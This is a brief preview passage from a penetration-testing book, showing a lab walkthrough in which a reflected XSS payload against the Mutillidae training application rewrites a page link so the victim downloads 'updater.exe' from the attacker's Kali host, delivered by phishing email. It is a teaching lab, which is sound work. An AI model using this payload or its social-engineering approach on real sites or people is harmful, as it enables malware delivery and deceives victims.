June 2017
Intermediate to advanced
338 pages
8h 28m
English
Let's place our executable in a quick-and-dirty Apache web server's default folder on the Kali VM, and craft a script to send along to prospective targets to deliver a reflected XSS JavaScript that now points the victim's browser to download the executable.
This is what it looks like:
http://172.16.30.129/mutillidae/index.php?page=user-info.php&username= <script>window.onload = function() {var AllLinks=document.getElementsByTagName("a"); AllLinks[0].href = "http://172.16.30.128/updater.exe"; }</script>
When we drop this into a quick and dirty e-mail (to my Windows 7 VM with IE 9), we can assume a better than 50% chance that the user will see the updater.exe filename, associate it with my trusted web ...
Read now
Unlock full access